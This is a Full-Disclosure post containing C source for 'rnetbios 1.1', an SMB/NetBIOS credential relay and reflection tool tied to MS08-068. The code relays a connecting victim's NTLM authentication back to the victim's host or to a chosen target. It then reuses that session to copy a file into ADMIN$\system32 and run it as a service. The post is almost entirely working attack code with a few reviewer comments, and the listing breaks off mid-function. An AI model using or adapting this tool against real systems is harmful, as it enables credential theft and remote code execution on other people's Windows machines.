
[Full-disclosure] rnetbios1.1 and about ms08-068



 
 
http://hi.baidu.com/yuange1975/blog/item/c4d825ecf55f373562d09f03.html
 
 
 

#include <windows.h> 
#include <winsock.h>
#include <stdio.h>
#include <string.h>
#include <winnetwk.h>
#pragma  comment(lib,"ws2_32")
#pragma  comment(lib,"Mpr.lib")

#define  BINDNUM      10         // number of consecutive listener addresses bound from argv[3] upwards (main)
#define  THREADNUM    BINDNUM    // one rnetbiosthread per listener
#define  SERVERPORT   139        // NetBIOS session service (TCP/139): both listeners and the outbound target connection use it
#define  BUFFSIZE     0x4000     // size of every per-session packet buffer (16 KiB); recv() is capped to this
/*
 * Per-thread description of one relay slot, filled in by main() and copied by
 * value into rnetbiosthread()/rnetbios().  The four "ip" members hold raw
 * in_addr values (network byte order) but are declared as SOCKET - they are
 * never used as sockets, the type is just wide enough to hold the address.
 */
typedef struct rserver{
   
 int socketclient;         // listening socket on argv[2]:139 that connecting clients hit (shared by all threads)
    int socketserver;      // this slot's listening socket on (argv[3]+slot):139, accepted later in waitfd4()
 int socketconnects;       // socket accepted from the connecting client (set in rnetbiosthread)
 int socketconnectd;       // outbound socket to the target's port 139 (set in rnetbiosthread)
  
 // struct sockaddr_in iprnetbios;
//  struct sockaddr_in ippsexec;
    SOCKET ipclient;       // address of socketclient; connections from it are ignored (rnetbiosthread)
    SOCKET iprnetbios;     // address of socketserver; also the host the psexec thread is pointed at (waitfd4)
    SOCKET ippsexec;       // argv[4]: only connections from this source are accepted on socketserver
    SOCKET ipdest;         // target address, or -1 to relay back to the connecting client's own address
// BOOL   rself;
//  SOCKET iprnetbios;
} RSERVER;
 
/*
 * Relay state for one session, owned by rnetbios().  The buffer members point
 * at rnetbios()'s stack arrays.  rnetchangepacket()/rnetchangepacket2() take a
 * by-value copy of this struct, so the *add pointers exist to let them write
 * the saved packet lengths back into the owner's copy.
 */
typedef struct rnet{

 int   fd;           // socket currently being read on the client side: fd2 before login, fd4 after (rnetbios loop end)
 int   fd2;          // socket accepted from the connecting client
    int   fd3;       // socket to the target
 int   fd4;          // socket accepted from the local client (argv[4]) in waitfd4(); 0 until then
 int   long72;       // length of the negotiate (0x72) response saved in buff72
    int   *long72add;    // &long72 of the owner's struct, written by rnetchangepacket2()
    int   long73ok;      // length of the successful session-setup response saved in buff73ok
    int   *long73okadd;  // &long73ok of the owner's struct, written by rnetchangepacket2()
 int   recvbytes;    // byte count of the packet currently in buff
 char *buff;         // the packet just received (BUFFSIZE+1 bytes)
 char *buff72;       // copy of the target's negotiate response
 char *buff73;       // copy of the client's session-setup request whose LM response length byte (0x33) is 0x18
 char *buff73ok;     // copy of the target's session-setup response with status 0
 char *filename;     // share/path name extracted from the client's request; becomes PSINFO.filename
    char *namereq;   // {0x81,0,0,0}: NBSS session-request prefix used for matching
    char *namereturn;    // never assigned in this listing
 char *ipbuff;       // dotted string of iprnetbios
 char *namebuff;     // 0x48-byte NBSS session request built by nameuncode()
    char *buffgetname;   // NetBIOS name-query template; assigned in rnetbios() but not read anywhere in this listing
    char *buff0x82;      // {0x82,0,0,0}: positive session response sent to the local client after login

 BOOL loginok;       // set TRUE in waitfd4() once the target accepted the relayed session setup

} RNET;
/*
 * Arguments for the psexec() thread.  waitfd4() passes the address of a stack
 * instance; psexec() copies it at entry.
 */
typedef struct psinfo{
   
 char *ip;        // host the service is installed on (waitfd4 passes this slot's own listener address)
 char *filename;  // local path of the file copied to \\ip\admin$\system32 and started as a service
}PSINFO;
 

// NOTE(review): rnetbiosthread is declared here with `void *` but defined with
// `RSERVER *` (conflicting types); waitfd4 returns an int that actually carries
// a thread HANDLE, and both thread functions are handed to CreateThread through
// casts rather than having the LPTHREAD_START_ROUTINE signature.
void   psexec(PSINFO *psinfo);
void   rnetbios(RSERVER *rinfo);
void   rnetbiosthread(void *rinfo );
void   nameuncode(char *namebuff,char *ipbuff);
void   changepass(char *buff,char *buff73);
int    waitfd4(RNET *rnetinfo,RSERVER *rinfoadd);
BOOL   rnetchangepacket(RNET *rnetinfo);
BOOL   rnetchangepacket2(RNET *rnetinfo);

int    newsend(int fd,char *buff,int size,int flag);
/*
 * Entry point.  Arguments (all required, argc<5 exits):
 *   argv[1] target address, or 0 to relay each incoming client back to its own
 *           source address (the reflection case the subject line refers to);
 *   argv[2] address the client-facing listener binds on;
 *   argv[3] first of BINDNUM consecutive addresses, one listener per thread;
 *   argv[4] address from which the local SMB client is expected to connect
 *           back (checked in waitfd4).
 * Creates THREADNUM listeners, starts one rnetbiosthread per slot and sleeps.
 * Invalid argv[2..4] fall back to hard-coded 192.168.0.x addresses.
 *
 * NOTE(review): this listing is mail-wrapped.  The "usage:" printf strings are
 * split across two physical lines, and the "yuange.yeah.net" line ends in a
 * mangled `";);` - both must be repaired before this compiles.
 */
int main(int argc, char **argv)
{
  RSERVER  rinfo[THREADNUM];
  int      fd2;
  int      fd3[BINDNUM];
  struct   sockaddr_in s_in1,s_in2,s_in3,s_in4;   // s_in1 gets only sin_addr set and is otherwise unused
  struct   hostent *he;
  int      i;  //,randnum;   
  int      result;
  BOOL     loginhimself;   // set but never read
  SOCKET   d_ip,bindip;    // hold in_addr values, not sockets
  
  WSADATA  wsaData;
  DWORD    ThreadID;       // one variable shared by every CreateThread call below
  
    printf("\n rnetbios ver 1.1.");
 printf("\n copy by yuange 2000.4.7.");
 printf("\n rcopy 2002.10.14.");
 printf("\n welcome to my homepage http://yuange.yeah.net.";);
 printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind ip2] 
[rnetbios client ip][new can netbios ip]",argv[0]);
 printf("\n example:%s 0 192.168.5.9 192.168.6.9 192.168.7.9",argv[0]);  
// printf("\n when somebody file:\\yourip,your host will rnetbios to the [ip] 
\n or his source ip if you haven't specified [ip] address");
// printf("\n After he login ,you can file:\\127.0.0.1 to the [ip] .\n ");
 //   psexec(1);
    if(argc<5){
  printf("\n error!\n");
      printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind 
ip2] [rnetbios client ip][new can netbios ip]",argv[0]);
     printf("\n\n");
  exit(1);
    }

    result= WSAStartup(MAKEWORD(1, 1), &wsaData);
    if (result != 0) {
  fprintf(stderr, "Your computer was not connected "
   "to the Internet at the time that "
   "this program was launched, or you "
   "do not have a 32-bit "
   "connection to the Internet.");
  exit(2);
 }
/*
  for(i=0,j=0;i<16;++i){
         name=servername[i] ;
       if(name==0) j=1;
       if(j==1) name=0x20;
       namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
       namebuff[2*i+6]= (name & 0x000F) + 'A';
 }
    namebuff[37]=0; 
*/
    // Resolve argv[1]; inet_addr() returns INADDR_NONE (-1) on a non-numeric
    // string, which is then tried as a host name.  A failed lookup leaves
    // d_ip at -1 and therefore silently selects the reflection mode below.
    d_ip=-1;
    d_ip = inet_addr(argv[1]);
    if(d_ip==-1){
          he = gethostbyname(argv[1]); 
       if(!he)  printf("\n Can't get the ip of %s !\n",argv[1]); //server);
          else     memcpy(&d_ip, he->h_addr, sizeof(d_ip));
 }  
 
 // "0" (or unresolvable) means: connect back to whichever host connects to us.
 if(d_ip==0) d_ip=-1;
 if(d_ip==-1){
  loginhimself=1;
  printf("\n rnetbios to the netbios ip.");
 }
 else   {
  loginhimself=0;
  printf("\n rnetbios to %s",argv[1]); //server);
 }
  s_in1.sin_addr.s_addr=d_ip;
    // Client-facing listener on argv[2]:139.  socket() is not checked, the
    // sockaddr_in is passed without the (struct sockaddr *) cast, and its
    // sin_zero is left uninitialised.
    fd2 = socket(AF_INET, SOCK_STREAM,0);
    s_in2.sin_family = AF_INET;
    s_in2.sin_port = htons(SERVERPORT);
    s_in2.sin_addr.s_addr = 0;
    s_in2.sin_addr.s_addr = inet_addr(argv[2]);
 if(s_in2.sin_addr.s_addr==0||s_in2.sin_addr.s_addr==-1){
       printf("\n\n argv[2] ip error. use the ip: 192.168.0.2");
       s_in2.sin_addr.s_addr = inet_addr("192.168.0.2");
    }
 i=bind(fd2,&s_in2, sizeof(s_in2));
    if(i<0){
   i=WSAGetLastError();
      printf("\n bind error 0x%x",i);
      exit(1);
    }
 
 i=listen(fd2,100); 
    if(i<0){
   i=WSAGetLastError();
      printf("\n bind error 0x%x",i);   // message says "bind" but this is the listen() failure
      exit(1);
    }
 
    s_in3.sin_family = AF_INET;
    s_in3.sin_port = htons(SERVERPORT);
    s_in3.sin_addr.s_addr = 0;
    s_in3.sin_addr.s_addr = inet_addr(argv[3]);
 if(s_in3.sin_addr.s_addr==0||s_in3.sin_addr.s_addr==-1){
       printf("\n\n argv[3] ip error. use the ip: 192.168.0.3");
       s_in3.sin_addr.s_addr = inet_addr("192.168.0.3");
    }
    
 // BINDNUM listeners on argv[3], argv[3]+1, ... (host-order increment).
 // None of socket()/bind()/listen() is checked here, so a missing alias
 // address only shows up later as accept() failures in waitfd4().
 bindip=s_in3.sin_addr.s_addr;
 for(i=0;i<BINDNUM;++i){
       fd3[i] = socket(AF_INET, SOCK_STREAM,0);
    bind(fd3[i],&s_in3, sizeof(s_in3));
    listen(fd3[i],10); 
       s_in3.sin_addr.s_addr=ntohl(htonl(s_in3.sin_addr.s_addr)+1);
    }
 
 // s_in4 only ever supplies its address; family/port are never set.
 s_in4.sin_addr.s_addr = 0;
    s_in4.sin_addr.s_addr = inet_addr(argv[4]);
 if(s_in4.sin_addr.s_addr==0||s_in4.sin_addr.s_addr==-1){
       printf("\n\n argv[4] ip error. use the ip: 192.168.0.4");
       s_in4.sin_addr.s_addr = inet_addr("192.168.0.4");
    }

    // One thread per slot; all threads accept() on the same fd2 and each owns
    // one fd3[i].  rinfo[] lives on main()'s stack, which is fine only
    // because main() never returns before the Sleep() below elapses.
    for(i=0;i<THREADNUM;++i){
 
  rinfo[i].socketclient=fd2;
  rinfo[i].socketserver=fd3[i];
  rinfo[i].ipclient=s_in2.sin_addr.s_addr;
  rinfo[i].iprnetbios=ntohl(htonl(bindip)+i);
  rinfo[i].ippsexec=s_in4.sin_addr.s_addr;
  rinfo[i].ipdest=d_ip;
     
CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)rnetbiosthread,(LPVOID)&rinfo[i],(DWORD)0,(LPDWORD)&ThreadID);
  

 } 
 Sleep(0x7fffffff);   // ~24.8 days; the threads run forever, cleanup below is effectively unreachable
  //  closesocket(fd1);
    closesocket(fd2);
 //   closesocket(fd3);
 //   closesocket(fd4);
    WSACleanup( );
    return(0); 
}
 
 /*
  * Thread body started by waitfd4().  Maps \\ip\admin$, copies the local file
  * info->filename to \\ip\admin$\system32\<random temp name>, registers that
  * name as a demand-start service through the remote SCM, starts it, then
  * deletes the service and the file and drops the mapping.
  *
  * The Administrator/"test" credentials below are placeholders: waitfd4()
  * passes this slot's own listener address as `ip`, so the redirector's
  * session setup is what rnetbios()/changepass() rewrite before it reaches
  * the real target (see rnetchangepacket).
  *
  * For a defender, the target-side footprint of this routine is a file write
  * into ADMIN$\system32 immediately followed by a service install, start and
  * delete (System log event 7045 on current Windows) under the relayed user's
  * identity - the standard remote-service-execution pattern.
  *
  * NOTE(review): every API result is printed but none is acted on - a NULL
  * scm/svc or a failed CopyFile still flows into the following calls.
  */
 void psexec(PSINFO *info) 
 {
  /*
   SECURITY_ATTRIBUTES sa;
   PROCESS_INFORMATION ProcessInformation;
   HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;   
   STARTUPINFO siinfo;
   
*/
   PSINFO  psinfo=*info;      // copy immediately: *info is on waitfd4()'s stack
   NETRESOURCE lpNetResource;
   int  fd1,i;                // fd1 is never set or used
 //  char *ip2;
   char cmdstr[0x100];
   char res[0x100];
   char filename[0x100];
   char tempfilename[0x100];
   char ser[0x100];
//   char *name="cc.exe";
   char *user="Administrator";
   char *pass="test";
   SC_HANDLE scm,svc; 
   char *cmdstrformat="psexec.exe \\\\%s -u Administrator -p test -s cmd.exe";
//   char *cmdstrformat="\\\\%s\\admin$ ";
 //  fd1=*(int *)(ip);
 //   ip2=*(int *)(ip+4)+8;
  // ip2="192.168.70.29";
   // cmdstr is built but never used: its consumers (system/CreateProcess) are commented out.
   wsprintf(cmdstr,cmdstrformat,psinfo.ip);  //"127.0.0.1");   //
   // Obtain a unique name: GetTempFileName creates an empty file, which is
   // removed again; only its base name (text after the last '\') is kept.
   GetTempPath(0x100,tempfilename);
   GetTempFileName(tempfilename,NULL,NULL,tempfilename);
   DeleteFile(tempfilename);
   for(i=strlen(tempfilename);i>0;--i){
    if(tempfilename[i]=='\\')
    {
     strcpy(tempfilename,tempfilename+i+1);
           break;
    }
   }
  // system(cmdstr);
  // ExitThread(0);
   // Unchecked: each wsprintf truncates at 1024 bytes, but the 0x100-byte
   // destinations are only safe because psinfo.ip is a short dotted address.
   wsprintf(res,"\\\\%s\\admin$",psinfo.ip);  
   wsprintf(filename,"\\\\%s\\admin$\\system32\\%s",psinfo.ip,tempfilename);  
   wsprintf(ser,"\\\\%s",psinfo.ip);  
  lpNetResource.dwScope=RESOURCE_CONNECTED;
  lpNetResource.dwType =RESOURCETYPE_DISK;
  lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
  lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
  lpNetResource.lpLocalName=NULL;
  lpNetResource.lpRemoteName=res;
  lpNetResource.lpComment=NULL;
  lpNetResource.lpProvider=NULL;

  i=WNetAddConnection2A(&lpNetResource,user,pass,CONNECT_UPDATE_PROFILE);   // result ignored
  scm=OpenSCManager(ser,NULL,SC_MANAGER_CREATE_SERVICE);
  printf("\n scm=0x%x err=0x%x ip=%s",scm,GetLastError(),psinfo.ip);
  // The service image path is the bare temp name; presumably it resolves to
  // the copy placed in system32 below - confirm against the target's lookup rules.
  svc=CreateService(scm,tempfilename,tempfilename,SERVICE_ALL_ACCESS, 
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_IGNORE,
 tempfilename,NULL,NULL,NULL,NULL,NULL);
  if(svc==NULL)  svc=OpenService(scm,tempfilename,SERVICE_ALL_ACCESS);
  printf("\n svc=0x%x err=0x%x",svc,GetLastError());
  i=CopyFile(psinfo.filename,filename,TRUE);   // TRUE: fail rather than overwrite an existing file
  printf("\n copy file error=0x%x ip=%s", GetLastError(),psinfo.ip);

  i=StartService(svc,0,NULL);
  printf("\n i=0x%x error=0x%x",i,GetLastError());
  i=DeleteService(svc);
  DeleteFile(filename);
 

  // printf("\n cmdstr=%s\n",cmdstr);
   /*
         sa.nLength=12;
            sa.lpSecurityDescriptor=0;
            sa.bInheritHandle=TRUE;
 
            CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
            CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);

    ZeroMemory(&siinfo,sizeof(siinfo));
     
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;
    siinfo.hStdOutput=hWritePipe1;
    siinfo.hStdError =hWritePipe1;
// 
CreateProcess(NULL,&cmdstr,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
            
  */
  //  system(cmdstr);

 //  printf("\n psexec end. closesocket fd1=0x%x",fd1);
  
   CloseServiceHandle(scm);
   CloseServiceHandle(svc);
 //  closesocket(fd1);
 //  closesocket(fd2); 
   i=WNetCancelConnection2A(res,CONNECT_UPDATE_PROFILE,TRUE);
   ExitThread(0);
   // unreachable: ExitThread() does not return
   printf("\n Exitthread erro1 !");
   return;
 }

/*
 * Thread body, one per slot.  Loops forever: accept() a client on the shared
 * listener, open a connection to the target's port 139 and hand both sockets
 * to rnetbios(), which runs the relay until that session ends.
 *
 * Target selection: rinfo.ipdest, or - when it is -1 - the source address of
 * the client that just connected, i.e. the connection is made back to the
 * client's own host (credential reflection).
 *
 * NOTE(review): accept()'s result is not checked, so on failure s_in1 is read
 * uninitialised and -1 is passed on; the sockets rnetbios() already closed
 * (fd1/fd2 == socketconnects/socketconnectd) are closed a second time here.
 */
void  rnetbiosthread(RSERVER *rinfoadd)
{
      
   RSERVER rinfo;
      int i,fd1,fd2;
      struct sockaddr_in s_in1,s_in2;
      SOCKET dip;
      rinfo=*rinfoadd;   // private copy; socketconnects/socketconnectd are filled per session below
     // memcpy(&rinfo,rinfoadd,sizeof(rinfo));
   dip=rinfo.ipdest;
   while(1)
   {
         i=sizeof(struct sockaddr);
      fd1=accept(rinfo.socketclient,&s_in1,&i);
   // Connections originating from our own client-facing address are dropped.
   if(s_in1.sin_addr.s_addr!=rinfo.ipclient)
         {
 
    if(rinfo.ipdest==-1) dip=s_in1.sin_addr.s_addr;   // reflect to the connecting host
             fd2 = socket(AF_INET, SOCK_STREAM,0);
             s_in2.sin_family = AF_INET;
             s_in2.sin_port = htons(SERVERPORT);
             s_in2.sin_addr.s_addr = dip;
             printf("\n Connect %s",inet_ntoa(s_in2.sin_addr));
          if(!connect(fd2, (struct sockaddr *)&s_in2, sizeof(struct 
sockaddr_in)))
    {

                 printf("\n Connect %s ok!",inet_ntoa(s_in2.sin_addr));
                 rinfo.socketconnects=fd1;
     rinfo.socketconnectd=fd2;
     
     rnetbios(&rinfo);   // blocks for the lifetime of this relayed session
   //  printf("\n rnetbios return");
    }
    else  printf("\n Connect %s error!",inet_ntoa(s_in2.sin_addr));
    closesocket(fd2);
   }
   closesocket(fd1);
   }
   
   ExitThread(1);   // unreachable: the loop above never exits
  
}
 /*
  * Relay loop for one session.  Polls two non-blocking sockets every 5 ms:
  *   fd  - the client side (socketconnects until login, then the local
  *         client's socket fd4 that waitfd4() accepted), handled by
  *         rnetchangepacket();
  *   fd3 - the target (socketconnectd), handled by rnetchangepacket2().
  * Either handler returning TRUE means a share/path name was captured and
  * waitfd4() is called, which marks login, starts the psexec thread and waits
  * for the local client to connect back.  The loop ends when either side
  * resets the connection (WSAECONNRESET == 0x2746) or, after login, when the
  * psexec thread has exited.
  *
  * NOTE(review): `fd=fd2;` below reads fd2 before it is assigned, so the first
  * recv() of the loop uses an indeterminate socket value; fd (and rnetinfo.fd)
  * only become fd2 at the end of the first iteration.  j, k, name, s_in2,
  * s_in4, addr2, namereturn and buffgetname are unused.
  */
 void  rnetbios(RSERVER *rinfoadd)
 {
  
  RNET      rnetinfo;
  RSERVER   rinfo=*rinfoadd;
//  PSINFO  psinfo; 
  int     fd,fd2,fd3,fd4;
  struct  sockaddr_in s_in1,s_in2,s_in4;

  // All session buffers live on this thread's stack (5 x 16 KiB + change).
  char buff[BUFFSIZE+1];
  char buff72[BUFFSIZE+1];
  char buff73[BUFFSIZE+1];
  char buff73ok[BUFFSIZE+1];
  char filename[BUFFSIZE+1];
  char buff0x82[]={0x82,0,0,0};   // NBSS positive session response (only 4 of the 6 bytes newsend() later sends are initialised here)
  char namereq[]={0x81,0,0,0};    // NBSS session request prefix
 // int  long72=0;
 
  u_short  name;
  // NetBIOS name query for the wildcard name "*" (0x20 + "CKAAAA..."); stored in rnetinfo but not used in this listing.
  char 
buffgetname[]={0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,0x41,0x41,0x41,0x41,0x41,0x41
   
,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,0x00,0x01};
  // 0x48-byte NBSS session request template; nameuncode() overwrites both
  // encoded names (called name at [5..0x24], calling name at [0x27..0x46]).
  char 
namebuff[]={0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,0x46,0x48,0x45,0x50,0x46
   
,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,00
   
,0x20,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x43,0x41,0x43,0x41,0x43,0x41
   ,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,00
   };
  char ipbuff[0x100];
  char namereturn[]={0x82,0,0,0,0,0};
 
  struct sockaddr addr2;
  int i,j,k,exitcode;
  //,k,l,ii;
 // int usernameaddress1;
 // int usernameaddress2;
 
  
 // int  strflg1,strflg2;
  DWORD       ThreadID;
  HANDLE      threadhandle=0;   // psexec thread, returned (as int) by waitfd4()
  
 // BOOL     loginok;

        // Calling name for the session request = this slot's own listener address.
        s_in1.sin_addr.s_addr=rinfo.iprnetbios;
  wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));
        nameuncode(namebuff,ipbuff);
       
      fd=fd2;   // BUG: fd2 is still uninitialised here (assigned on the next line)
        fd2=rinfo.socketconnects;
     fd3=rinfo.socketconnectd;
        fd4=0;
  rnetinfo.fd2=fd2;
  rnetinfo.fd3=fd3;
  rnetinfo.fd4=fd4;
        rnetinfo.buff=buff;
  rnetinfo.buff72=buff72;
  rnetinfo.buff73=buff73;
        rnetinfo.buff73ok=buff73ok;
  rnetinfo.filename=filename;
  rnetinfo.buffgetname=buffgetname;
  rnetinfo.ipbuff=ipbuff;
  rnetinfo.namebuff=namebuff;
        rnetinfo.buff0x82=buff0x82;
        rnetinfo.namereq=namereq;
  rnetinfo.long72add=&rnetinfo.long72;
  rnetinfo.long72=0;
     rnetinfo.long73okadd=&rnetinfo.long73ok;
  rnetinfo.long73ok=0;
     rnetinfo.loginok=FALSE;
  // rnetinfo.fd is not set until the bottom of the first loop iteration.

 //     printf("\n Connect %s",inet_ntoa(s_in2.sin_addr));
      // Non-blocking mode on both session sockets and on the slot listener
      // (accept()ed later in waitfd4); `i` is an int where u_long is expected,
      // same width on Win32.
      i = 1;
         ioctlsocket(fd2, FIONBIO, &i);
   i = 1;
         ioctlsocket(fd3, FIONBIO, &i);
      
   i = 1;
         ioctlsocket(rinfo.socketserver, FIONBIO, &i);
      
   
   ThreadID=0;
            memset(buff,0,BUFFSIZE);
   memset(filename,0,BUFFSIZE);   // filename[BUFFSIZE] itself is never cleared
   while(1)
   {
    // After login, the session is over once the psexec thread is done.
    if(rnetinfo.loginok==TRUE)
    {
                    i=GetExitCodeThread(threadhandle,&exitcode);
     if(i==1&&exitcode!=STILL_ACTIVE){
        // printf("\n psexec exit 0x%x code",exitcode);
         break;
     }
    }
       Sleep(5);
               
           //  if(rnetinfo.loginok==TRUE) recv(fd2,buff,BUFFSIZE,0);
    // Client side.  Any error other than WSAECONNRESET (including the usual
    // WSAEWOULDBLOCK on a non-blocking socket) just falls through.
    i=recv(fd,buff,BUFFSIZE,0);
    if(i<=0&&WSAGetLastError()==0x2746) {
      //  printf("\n recv fd 0x%x bytes. error=0x2746",i);
     break;
                }
    if(i>0)
    {
     rnetinfo.recvbytes=i;
     if(rnetchangepacket(&rnetinfo)==TRUE)
                    {
                        threadhandle=waitfd4(&rnetinfo,&rinfo);   // sets loginok and fd4 in rnetinfo
       
     }
                    memset(buff,0,BUFFSIZE);
                
    }

                
    // Target side.
             i=recv(fd3,buff,BUFFSIZE,0);
             if(i<=0&&WSAGetLastError()==0x2746) {
       //    printf("\n recv fd3 0x%x bytes. error=0x2746",i);
     break;
                }
          if(i>0)
    {
         rnetinfo.recvbytes=i; 
           if(rnetchangepacket2(&rnetinfo)==TRUE)   // never TRUE in this listing; kept for symmetry
      {
                            threadhandle=waitfd4(&rnetinfo,&rinfo); 
       
      }
                        memset(buff,0,BUFFSIZE);
                            
    }
    // Switch the client-side socket to the local client once logged in.
    if(rnetinfo.loginok==FALSE) fd=fd2;
    else                        fd=rnetinfo.fd4;
                rnetinfo.fd=fd;

   }

            closesocket(fd2);
   closesocket(fd3);
            closesocket(rnetinfo.fd4);   // 0 (or -1 after a failed accept) if login never happened
   CloseHandle(threadhandle);        // threadhandle may still be the initial 0
         return;
}
 
 
 

/*
 * Fill in the two names of the NBSS session-request template in namebuff
 * (RFC 1001 first-level encoding: every byte becomes two letters, 'A' plus
 * the high nibble and 'A' plus the low nibble).
 *
 *   namebuff[0x05..0x24]  called name  "*SMBSERVER", space-padded to 16 bytes
 *   namebuff[0x25]        0
 *   namebuff[0x27..0x46]  calling name = the text in ipbuff, space-padded
 *   namebuff[0x47]        0
 *
 * ipbuff is read only up to its first NUL (at most 16 bytes); bytes after a
 * NUL are encoded as 0x20.  No other byte of namebuff is touched.
 */
void nameuncode(char *namebuff,char *ipbuff)
{
    static const char called[16] = "*SMBSERVER";   /* zero-padded to 16 */
    const char *sources[2] = { ipbuff, called };
    char *targets[2] = { namebuff + 0x27, namebuff + 5 };
    int which;

    for (which = 0; which < 2; ++which) {
        const char *src = sources[which];
        char *dst = targets[which];
        int past_end = 0;
        int pos;

        for (pos = 0; pos < 16; ++pos) {
            unsigned ch = 0x20;
            if (!past_end) {
                ch = (unsigned char)src[pos];
                if (ch == 0) {
                    past_end = 1;
                    ch = 0x20;
                }
            }
            dst[2 * pos] = (char)('A' + (ch >> 4));
            dst[2 * pos + 1] = (char)('A' + (ch & 0x0F));
        }
    }

    namebuff[0x25] = 0;
    namebuff[0x47] = 0;
}
 

/*
 * send() wrapper for the non-blocking sockets used by rnetbios(): switch the
 * socket to blocking mode so the whole packet goes out in one call, send, then
 * switch it back to non-blocking.  Returns send()'s result (bytes sent or
 * SOCKET_ERROR); callers mostly ignore it.  `i` is an int passed where
 * ioctlsocket expects a u_long pointer (same width on Win32).
 */
int newsend(int fd,char *buff,int size,int flag)
{
 int j;
    int i = 0;
    ioctlsocket(fd, FIONBIO, &i);   // blocking
 j=send(fd,buff,size,flag);
    i = 1;
 ioctlsocket(fd, FIONBIO, &i);   // back to non-blocking
    return j; 
}

/*
 * Splice the authentication fields of a saved SESSION_SETUP_ANDX request
 * (buff73, captured from the connecting client) into the one just received
 * from the local client (buff), in place:
 *   - the 24-byte LM response at 0x41, and the 24-byte NT response after it
 *     when the NT-response length byte (0x35) is 0x18;
 *   - the account name that follows, converting between 8-bit and UTF-16
 *     according to each packet's SMB_FLAGS2_UNICODE bit (buff[0x0f] & 0x80).
 * The password-length and flag bytes of buff are left as they were.
 *
 * Both parameters are really `char **` (the caller passes &rnetinfo.buff and
 * &rnetinfo.buff73): the pointers are recovered by reading them as int, which
 * only works where a pointer fits in an int (32-bit builds).
 *
 * NOTE(review): the name copy loop has no upper bound - it runs until a NUL
 * is found in buff73 and writes past the end of buff if the packet is longer
 * than the buffer; nothing here checks recvbytes.
 */
void  changepass(char *buff11,char *buff7311)
{
 
  char     *buff=*(int *)buff11;
  char     *buff73=*(int *)buff7311;
  int      usernameaddress1;
  int      usernameaddress2;
  int      strflg1,strflg2;   
  u_short  name;    
         memcpy(buff+0x41,buff73+0x41,0x18);
         // copy password
         if(buff[0x35]==0x18) memcpy(buff+0x41+0x18,buff73+0x41+0x18,0x18);
 
         // copy the next password
         strflg1=buff73[0x0f];
         strflg1&=0x80;
         if(strflg1!=0) strflg1=1;
         strflg2=buff[0x0f];
         strflg2&=0x80;
         if(strflg2!=0) strflg2=1;
         //str is unicode ?
         // name starts after LM (0x18) + NT response (buff[0x35] bytes),
         // plus one alignment pad byte when the string is UTF-16.
         usernameaddress1=0x41+0x18+buff73[0x35]+strflg1;
         usernameaddress2=0x41+0x18+buff[0x35]+strflg2;
         name=1;
         while(name!=0){
         name=buff73[usernameaddress1];
         if(strflg1==0) ++usernameaddress1;
         else usernameaddress1+=2;
         buff[usernameaddress2]=name;
         ++usernameaddress2;
         if(strflg2!=0) {
          ++usernameaddress2;
          buff[usernameaddress2]=0;
         }
         } 
         // copy user name - not rigorous, but it works well enough.
}
 
/*
 * Handle one packet from the client side (rnetinfo.fd) and forward it to the
 * target on fd3, editing a few fields first.  Packet layout used throughout:
 * 4-byte NBSS header, then the SMB header, so buff[8] is the SMB command,
 * buff+9 the NT status, buff+0x1c..0x23 TID/PID/UID/MID.
 *
 * Before login it records the client's session setup (buff73) and, once the
 * client names a share or path, copies that name into rnetinfo->filename and
 * returns TRUE so rnetbios() calls waitfd4().  After login it services the
 * local client instead: replays the target's saved negotiate response, and
 * rewrites the local client's session setup with the recorded credentials
 * (changepass) and the target-assigned UID before forwarding.
 *
 * rnetinfo is a by-value copy of *rnetinfoadd: stores to rnetinfo.long72 and
 * rnetinfo.recvbytes below are lost on return; only the pointed-to buffers
 * and rnetinfo->filename are visibly modified.
 *
 * NOTE(review): this listing is mail-wrapped.  Lines starting at column 0
 * that begin with `rnetinfo.recvbytes=` or `bytes.",` are the tails of the
 * physical line above them; where that line is a `//` comment the tail is
 * commented out too (e.g. the newsend() after `//       ` in the 0x32/0x05
 * branch), where it is an `if(...)` or plain indentation the tail is live.
 */
BOOL  rnetchangepacket(RNET *rnetinfoadd)
{
   
  
  char filename[0x100];
  unsigned char name;
     int i,j,k;
     RNET rnetinfo=*rnetinfoadd;
     // 0x32 = SMB_COM_TRANSACTION2; buff+0x41 is Setup[0], the TRANS2 subcommand.
     if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32)
  {
   i=*(WORD *)(rnetinfo.buff+0x41);
   // 0x05 = TRANS2_QUERY_PATH_INFORMATION; the path is taken from the fixed
   // offset 0x4e (the author's assumption about the request layout).
   // The copy is the rest of the packet, not a terminated string; it only
   // ends up NUL-terminated because rnetbios() zero-filled filename once.
   if(i==0x05&&rnetinfo.recvbytes>0x4e&&rnetinfo.buff[0x4e]!=0)
   {   
    memcpy(rnetinfo.filename,rnetinfo.buff+0x4e,rnetinfo.recvbytes-0x4e);
